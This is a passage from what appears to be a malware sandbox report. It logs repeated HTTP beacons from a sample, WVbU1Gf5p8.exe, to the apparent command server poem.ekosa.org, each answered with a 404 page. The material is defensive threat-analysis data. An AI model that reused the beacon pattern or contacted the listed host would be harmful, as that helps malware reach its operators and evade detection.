      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      214192.168.2.449994210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:01.435544014 CET5253OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:01.703845978 CET5253INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:01 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      215192.168.2.449995210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:01.973064899 CET5254OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:02.232410908 CET5255INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:01 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      216192.168.2.449996210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:02.624804020 CET5255OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:02.896562099 CET5256INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:02 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      217192.168.2.449997210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:03.172489882 CET5256OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:03.441670895 CET5257INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:02 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      218192.168.2.449998210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:03.708731890 CET5258OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:03.969791889 CET5258INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:03 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      219192.168.2.449999210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:04.347138882 CET5259OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:04.606370926 CET5260INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:03 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      22192.168.2.449786210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:09.309863091 CET392OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:09.571054935 CET392INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:09 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      220192.168.2.450000210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:04.880650043 CET5260OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:05.148592949 CET5261INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:05 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      221192.168.2.450001210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:05.413639069 CET5261OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:05.672926903 CET5262INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:05 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      222192.168.2.450002210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:06.053875923 CET5263OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:06.316679001 CET5263INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:06 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      223192.168.2.450003210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:06.586606026 CET5264OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
